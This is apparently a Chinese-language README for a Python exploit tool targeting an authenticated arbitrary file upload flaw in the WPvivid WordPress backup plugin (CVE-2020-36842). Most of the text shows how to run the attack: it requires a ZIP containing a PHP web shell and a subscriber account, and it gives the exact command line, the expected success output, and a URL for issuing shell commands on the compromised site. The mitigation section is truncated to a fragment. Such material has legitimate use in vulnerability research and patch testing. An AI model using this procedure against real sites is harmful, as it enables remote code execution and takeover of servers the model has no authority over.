
发布日期:2024-10-16 | 迁移、备份、暂存 – WPvivid <= 0.9.35 - 经过身份验证的(订阅者及以上权限)任意文件上传
WPvivid WordPress 插件(用于站点迁移和备份)存在一个任意文件上传漏洞。该漏洞允许拥有低权限的已认证用户上传并解压 ZIP 文件,如果解压后的文件中包含恶意脚本,则可能导致远程代码执行 (RCE)。
已编写了一个 Python 利用脚本,采用以下方法来利用此漏洞:
如果利用成功,脚本将输出:
[+] 登录成功。
[+] 目标存在漏洞,正在继续利用。
[+] 上传文件:成功
[+] 确认上传:成功
[+] 开始导入:成功
[+] Shell 已成功上传至:http://target-site.com/wp-content/nxploit.php
确保在利用脚本所在目录中存在一个恶意的 shell.zip 文件。
该 shell.zip 文件应包含一个 PHP Web shell (例如 nxploit.php)。
需要拥有一个具备订阅者或更高权限的有效 WordPress 账户。
python CVE-2020-36842.py -u http://target-site.com -un username khaled -p password 123
脚本将检查目标版本,并使用提供的凭据登录。
如果目标存在漏洞,脚本将上传 shell.zip 并解压它。
如果成功,脚本将提供已上传 Shell 的 URL。
一旦 Shell 成功上传并解压,您可以通过以下 URL 发送命令进行交互:
http://target-site.com/wp-content/nxploit.php?cmd=pwd
为缓解此漏洞,强烈建议:
wp-content/uploads 目录中的直接脚本执行。该漏洞带来了严重风险,因为它使已认证的攻击者能够在 WordPress 服务器上上传并执行恶意文件。站点管理员应立即采取措施保护其安装。
免责声明: 本文档仅用于道德安全研究和教育目的。未经许可利用漏洞是违法的,并将受到相关法律的惩罚。(Nxploit | Khaled_alenazi)